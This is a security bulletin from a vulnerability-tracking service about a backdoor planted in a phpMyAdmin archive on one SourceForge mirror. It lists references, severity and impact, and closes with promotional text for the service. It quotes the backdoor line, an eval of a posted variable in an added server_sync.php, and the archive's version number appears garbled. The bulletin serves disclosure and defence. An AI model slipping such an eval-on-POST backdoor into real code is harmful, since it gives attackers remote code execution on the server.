|The Vigil@nce team watches public vulnerabilities impacting your computers, and then offers security solutions, a database and tools to fix them.|
phpMyAdmin: backdoor in server_sync.php
Synthesis of the vulnerability
One server from SourceForge.net was distributing a phpMyAdmin archive with a backdoor.
Impacted products: phpMyAdmin.
Severity of this bulletin: 3/4.
Consequences of an intrusion: privileged access/rights, user access/rights.
Hacker's origin: internet server.
Creation date: 26/09/2012.
Références of this threat: BID-55672, CERTA-2012-AVI-523, CVE-2012-5159, PMASA-2012-5, VIGILANCE-VUL-11979.
Description of the vulnerability
The phpMyAdmin software is distributed via SourceForge.
The Korean "cdnetworks-kr-1" mirror contained an altered version of the archive phpMyAdmin-188.8.131.52-all-languages.zip. A new file named "server_sync.php" was added in the archive (VIGILANCE-ACTU-3590). This script evaluates the posted "c" variable (with "eval($_POST['c'])").
An attacker can therefore directly access to the web page "server_sync.php", in order to execute code on the server.
Full Vigil@nce bulletin... (Free trial)
Computer vulnerabilities tracking service
Vigil@nce provides computers vulnerabilities analysis. The Vigil@nce security watch publishes vulnerability bulletins about threats impacting the information system. The technology watch team tracks security threats targeting the computer system. The Vigil@nce computer vulnerability tracking service alerts your teams of vulnerabilities or threats impacting your information system.